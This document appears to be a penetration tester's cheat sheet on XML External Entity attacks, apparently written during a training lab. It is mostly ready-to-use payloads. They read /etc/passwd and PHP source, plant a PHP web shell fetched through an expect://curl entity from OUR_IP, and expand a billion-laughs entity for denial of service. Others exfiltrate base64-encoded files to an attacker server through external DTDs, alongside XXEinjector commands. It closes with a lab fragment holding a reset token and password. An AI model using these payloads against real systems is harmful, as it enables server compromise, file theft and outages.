8.3 Web XXE
XML DTD
XML Document Type Definition (DTD) allows the validation of an XML document against a pre-defined document structure.
Tools
https://www.convertjson.com/json-to-xml.htm
https://github.com/payloadbox/xxe-injection-payload-list
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE Injection/README.md
https://github.com/payloadbox/xxe-injection-payload-list/blob/master/Intruder/xxe-injection-payload-list.txt.txt
Local file Disclosure
- Identify vulnerable element.
- Develop DTD.
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
- Add to Post Request and call the entity " Company"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
<!ENTITY test "Test LFI">
]>
<root>
<name>First</name>
<tel>1111111111</tel>
<email>&test;</email>
<message>111111111</message>
</root>
PHP wrapper
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
PHP Reverse shell
$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
$ sudo python3 -m http.server 80
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
SSRF exploitation using XXE Vulnerability
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name></name>
<tel></tel>
<email>&a10;</email>
<message></message>
</root>
XML Parameter Entities
Use a % character that only can be used in DTD.
$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
$ python3 -m http.server 8000
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
Error Based XXE
#Create a dtd.
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
Send the below from burp
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Blind Data Exfiltration
Out-of-band Data Exfiltration
Step 1.
Create a dtd file
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
Step 2.
create a index.php
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
Step 3.
Start a php server
php -S 0.0.0.0:8000
Step 4.
Send a payload using a proxy tool.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Automated OOB Exfiltration
https://github.com/enjoiz/XXEinjector
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
$ruby XXEinjector.rb --host=127.0.0.1 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
cat Logs/10.129.201.94/etc/passwd.log
Skill Assessment
GET on /api.php/user/74
Gives account information
Post on /reset.php
Allow you to change password
52
uid=52&token=e51a85fa-17ac-11ec-8e51-e78234eb7b0c&password=Academy_student!
a.corrales